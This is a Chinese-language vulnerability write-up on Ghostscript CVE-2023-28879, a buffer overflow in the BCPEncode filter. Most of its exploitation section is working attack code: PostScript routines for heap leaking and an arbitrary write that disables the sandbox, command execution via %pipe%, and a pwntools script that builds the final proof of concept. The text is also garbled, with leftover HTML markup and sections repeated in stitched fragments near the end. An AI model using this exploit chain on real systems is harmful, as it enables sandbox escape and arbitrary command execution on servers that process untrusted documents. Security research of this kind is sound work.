Ghostscript漏洞分析：CVE-2023-28879深度解析与利用<\/h1>

漏洞概述<\/h2>
CVE-2023-28879是Artifex Software Ghostscript中的一个严重漏洞，影响10.01.0及之前版本。该漏洞存在于BCPEncode、BCPDecode、TBCPEncode和TBCPDecode组件中，允许攻击者通过精心构造的PostScript文件禁用沙箱保护机制，进而实现远程代码执行。<\/p>

受影响版本<\/h2>

Ghostscript@(-∞, 10.01.1)<\/li>

ghostscript@(-∞, 10.0.0~dfsg-11)<\/li> <\/ul>

漏洞技术分析<\/h2>

根本原因<\/h3>
漏洞源于`s_xBCPE_process<\/code>函数中的缓冲区处理错误。当写入缓冲区的数据比总长度少一个字节时，尝试写入转义字符会导致两个字节被写入，造成缓冲区溢出。<\/p>`

关键函数分析<\/h3>
s_xBCPE_process<\/code>函数位于base\/sbcp.c<\/code>中，主要逻辑如下：<\/p>
static<\/span> int<\/span> s_xBCPE_process<\/span>(stream_state *<\/span> st, stream_cursor_read *<\/span> pr, 
<\/span><\/span>                          stream_cursor_write *<\/span> pw, bool<\/span> last, const<\/span> byte *<\/span> escaped) {
<\/span><\/span>    const<\/span> byte *<\/span>p =<\/span> pr-><\/span>ptr;
<\/span><\/span>    const<\/span> byte *<\/span>rlimit =<\/span> pr-><\/span>limit;
<\/span><\/span>    uint rcount =<\/span> rlimit -<\/span> p;
<\/span><\/span>    byte *<\/span>q =<\/span> pw-><\/span>ptr;
<\/span><\/span>    uint wcount =<\/span> pw-><\/span>limit -<\/span> q;
<\/span><\/span>    const<\/span> byte *<\/span>end =<\/span> p +<\/span> min(rcount, wcount);
<\/span><\/span>    
<\/span><\/span>    while<\/span> (p <<\/span> end) {
<\/span><\/span>        byte ch =<\/span> *++<\/span>p;
<\/span><\/span>        if<\/span> (ch <=<\/span> 31<\/span> &&<\/span> escaped[ch]) {
<\/span><\/span>            if<\/span> (p ==<\/span> rlimit) {
<\/span><\/span>                p--<\/span>;
<\/span><\/span>                break<\/span>;
<\/span><\/span>            }
<\/span><\/span>            *++<\/span>q =<\/span> CtrlA;
<\/span><\/span>            ch ^=<\/span> 0x40<\/span>;
<\/span><\/span>            if<\/span> (--<\/span>wcount <<\/span> rcount)
<\/span><\/span>                end--<\/span>;
<\/span><\/span>            *++<\/span>q =<\/span> ch;
<\/span><\/span>        } else<\/span> {
<\/span><\/span>            *++<\/span>q =<\/span> ch;
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    pr-><\/span>ptr =<\/span> p;
<\/span><\/span>    pw-><\/span>ptr =<\/span> q;
<\/span><\/span>    return<\/span> (p ==<\/span> rlimit ?<\/span> 0<\/span> :<\/span> 1<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞触发条件<\/h3>

输入数据中包含需要转义的字符（ASCII值≤31且在转义列表中）<\/li>
缓冲区剩余空间恰好比待写入数据少一个字节<\/li>
触发转义字符写入路径<\/li>
<\/ol>
漏洞利用技术<\/h2>
利用步骤概述<\/h3>

堆地址泄露<\/strong>：通过精心构造的过滤器链泄露堆内存信息<\/li>
沙箱绕过<\/strong>：定位并覆写path_control_active<\/code>变量（禁用沙箱）<\/li>
命令执行<\/strong>：通过%pipe%<\/code>设备执行任意命令<\/li>
<\/ol>
详细利用过程<\/h3>
1. 堆地址泄露<\/h4>
构造特殊的PostScript代码链式调用多个过滤器：<\/p>
()<\/span>{} 
<\/span><\/span>\/zlibEncode filter<\/span> 
<\/span><\/span>\/BCPEncode filter<\/span> 
<\/span><\/span>\/LZWEncode filter<\/span> 
<\/span><\/span>\/ASCII85Encode filter<\/span> 
<\/span><\/span>\/ASCIIHexEncode filter<\/span> 
<\/span><\/span>\/PSStringEncode filter<\/span> 
<\/span><\/span>\/ASCII85Encode filter<\/span> 
<\/span><\/span>\/ASCIIHexEncode filter<\/span> 
<\/span><\/span>\/ASCIIHexEncode filter<\/span> 
<\/span><\/span>\/ASCIIHexEncode filter<\/span> 
<\/span><\/span>\/ASCII85Encode filter<\/span> 
<\/span><\/span>\/ASCII85Encode filter<\/span> 
<\/span><\/span>\/ASCIIHexEncode filter<\/span> 
<\/span><\/span>\/PSStringEncode filter<\/span> 
<\/span><\/span>\/ASCIIHexEncode filter<\/span> 
<\/span><\/span>\/ASCIIHexEncode filter<\/span> 
<\/span><\/span>\/BCPEncode filter<\/span> 
<\/span><\/span>\/ASCIIHexEncode filter<\/span> 
<\/span><\/span>\/PSStringEncode filter<\/span> 
<\/span><\/span>\/MD5Encode filter<\/span> 
<\/span><\/span>closefile<\/span>
<\/span><\/span><\/code><\/pre>2. 定位关键结构<\/h4>
通过泄露的堆地址计算path_control_active<\/code>变量的位置：<\/p>
\/leakMemory{
<\/span><\/span>    \/leakBuffer 5000<\/span> string<\/span> def<\/span>
<\/span><\/span>    \/leakMemoryFilter leakBuffer<\/span> \/NullEncode filter<\/span> \/BCPEncode filter<\/span> def<\/span>
<\/span><\/span>    createOverflow<\/span>
<\/span><\/span>    <4343434343434343<\/span>> concatstrings<\/span> % s->templat
<\/span><\/span><\/span><\/span>    <4444444444444444<\/span>> concatstrings<\/span> % s->memory
<\/span><\/span><\/span><\/span>    <4545454545454545<\/span>> concatstrings<\/span> % s->report_error
<\/span><\/span><\/span><\/span>    <4646464646464646<\/span>> concatstrings<\/span> % s->min_left
<\/span><\/span><\/span><\/span>    1<\/span> 1<\/span> 80<\/span> {pop<\/span> <47<\/span>> concatstrings<\/span> } for<\/span> % s->error_string
<\/span><\/span><\/span><\/span>    <4848484848484848<\/span>> concatstrings<\/span> % s->cursor->r->ptr
<\/span><\/span><\/span><\/span>    leakMemoryFilter<\/span> exch<\/span> writestring<\/span>
<\/span><\/span>    leakMemoryFilter<\/span> flushfile<\/span>
<\/span><\/span>    \/leak leakBuffer<\/span> 2176<\/span> 8<\/span> getinterval<\/span> def<\/span>
<\/span><\/span>    leak<\/span> reverse<\/span>
<\/span><\/span>} def<\/span>
<\/span><\/span><\/code><\/pre>3. 任意地址写入<\/h4>
覆盖path_control_active<\/code>变量：<\/p>
\/writewhatwhere {
<\/span><\/span>    createOverflow<\/span>
<\/span><\/span>    <4343434343434343<\/span>> concatstrings<\/span> % s->templat
<\/span><\/span><\/span><\/span>    <4444444444444444<\/span>> concatstrings<\/span> % s->memory
<\/span><\/span><\/span><\/span>    <4545454545454545<\/span>> concatstrings<\/span> % s->report_error
<\/span><\/span><\/span><\/span>    <4646464646464646<\/span>> concatstrings<\/span> % s->min_left
<\/span><\/span><\/span><\/span>    1<\/span> 1<\/span> 80<\/span> {pop<\/span> <47<\/span>> concatstrings<\/span> } for<\/span> % s->error_string
<\/span><\/span><\/span><\/span>    <4848484848484848<\/span>> concatstrings<\/span> % s->cursor->r->ptr
<\/span><\/span><\/span><\/span>    exch<\/span> concatstrings<\/span> % (where) s->cursor->r->limit
<\/span><\/span><\/span><\/span>    <4444444444444444<\/span>> concatstrings<\/span> % s->cursor->w->limit
<\/span><\/span><\/span><\/span>    <4545454545454545<\/span>> concatstrings<\/span> % s->cbuf.
<\/span><\/span><\/span><\/span>    \/openWriteFilter 5000<\/span> string<\/span> \/NullEncode filter<\/span> \/BCPEncode filter<\/span> def<\/span>
<\/span><\/span>    openWriteFilter<\/span> exch<\/span> writestring<\/span>
<\/span><\/span>    openWriteFilter<\/span> flushfile<\/span>
<\/span><\/span>    openWriteFilter<\/span> exch<\/span> writestring<\/span>
<\/span><\/span>}def<\/span>
<\/span><\/span><\/code><\/pre>4. 命令执行<\/h4>
禁用沙箱后通过%pipe%<\/code>执行命令：<\/p>
(%pipe%id)<\/span> (w)<\/span> file<\/span>  % 执行id命令
<\/span><\/span><\/span><\/code><\/pre>漏洞复现步骤<\/h2>


安装受影响版本：<\/p>
tar xzvf ghostscript-10.01.0.tar.gz
<\/span><\/span>cd .\/ghostscript-10.01.0
<\/span><\/span>.\/configure
<\/span><\/span>make
<\/span><\/span>make install
<\/span><\/span><\/code><\/pre><\/li>

生成POC：<\/p>
#!\/usr\/bin\/env python<\/span>
<\/span><\/span>from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> sys import<\/span> argv
<\/span><\/span>
<\/span><\/span>if<\/span> len(argv) !=<\/span> 2<\/span>:
<\/span><\/span>    print("Usage: python <\/span>{argv[0]}<\/span> \/path\/to\/gs_bin or libgs"<\/span>)
<\/span><\/span>    exit(1<\/span>)
<\/span><\/span>
<\/span><\/span>elf_path =<\/span> argv[1<\/span>]
<\/span><\/span>elf =<\/span> ELF(elf_path)
<\/span><\/span>
<\/span><\/span># 获取关键偏移量<\/span>
<\/span><\/span>init_addr =<\/span> elf.<\/span>get_section_by_name('.init'<\/span>).<\/span>header.<\/span>sh_addr
<\/span><\/span>system_plt_addr =<\/span> elf.<\/span>plt['system'<\/span>]
<\/span><\/span>libc_plt_offset =<\/span> system_plt_addr -<\/span> init_addr
<\/span><\/span>f_addr_s_std_noseek =<\/span> elf.<\/span>functions["s_std_noseek"<\/span>]
<\/span><\/span>f_addr_s_std_noseek_offset =<\/span> f_addr_s_std_noseek.<\/span>address -<\/span> init_addr
<\/span><\/span>
<\/span><\/span># 生成最终POC<\/span>
<\/span><\/span>with<\/span> open("final-poc.ps.template"<\/span>, "r"<\/span>) as<\/span> f:
<\/span><\/span>    final_file =<\/span> f.<\/span>read().<\/span>strip()
<\/span><\/span>final_file =<\/span> final_file.<\/span>replace("F_ADDR_S_STD_NOSEEK_OFFSET"<\/span>, str(f_addr_s_std_noseek_offset))
<\/span><\/span>final_file =<\/span> final_file.<\/span>replace("LIBC_PLT_OFFSET"<\/span>, str(libc_plt_offset))
<\/span><\/span>
<\/span><\/span>with<\/span> open("final-poc.ps"<\/span>, "w"<\/span>) as<\/span> f:
<\/span><\/span>    f.<\/span>write(final_file)
<\/span><\/span><\/code><\/pre><\/li>

执行POC：<\/p>
.\/gs -f final-poc.ps
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞修复<\/h2>
官方在10.01.1版本中修复了此漏洞。建议用户升级到最新版本，或应用官方补丁。<\/p>
防御措施<\/h2>

及时更新Ghostscript到最新版本<\/li>
对用户上传的PostScript文件进行严格过滤<\/li>
在沙箱环境中运行Ghostscript<\/li>
监控异常进程行为<\/li>
<\/ol>
参考资源<\/h2>

Artifex Software Security Advisory<\/a><\/li>
Almond Offensive Security Blog - Shell in the Ghost<\/a><\/li>
Ghostscript Official Documentation<\/a><\/li>
<\/ol>

Ghostscript漏洞分析：CVE-2023-28879深度解析与利用<\/h1>

漏洞技术分析<\/h2>

根本原因<\/h3> 漏洞源于s_xBCPE_process<\/code>函数中的缓冲区处理错误。当写入缓冲区的数据比总长度少一个字节时，尝试写入转义字符会导致两个字节被写入，造成缓冲区溢出。<\/p>

漏洞利用技术<\/h2>

详细利用过程<\/h3>

漏洞修复<\/h2> 官方在10.01.1版本中修复了此漏洞。建议用户升级到最新版本，或应用官方补丁。<\/p>

参考资源<\/h2> Artifex Software Security Advisory<\/a><\/li> Almond Offensive Security Blog - Shell in the Ghost<\/a><\/li> Ghostscript Official Documentation<\/a><\/li> <\/ol>

根本原因<\/h3>
漏洞源于`s_xBCPE_process<\/code>函数中的缓冲区处理错误。当写入缓冲区的数据比总长度少一个字节时，尝试写入转义字符会导致两个字节被写入，造成缓冲区溢出。<\/p>`

漏洞修复<\/h2>
官方在10.01.1版本中修复了此漏洞。建议用户升级到最新版本，或应用官方补丁。<\/p>

参考资源<\/h2>

Artifex Software Security Advisory<\/a><\/li>
Almond Offensive Security Blog - Shell in the Ghost<\/a><\/li>
Ghostscript Official Documentation<\/a><\/li> <\/ol>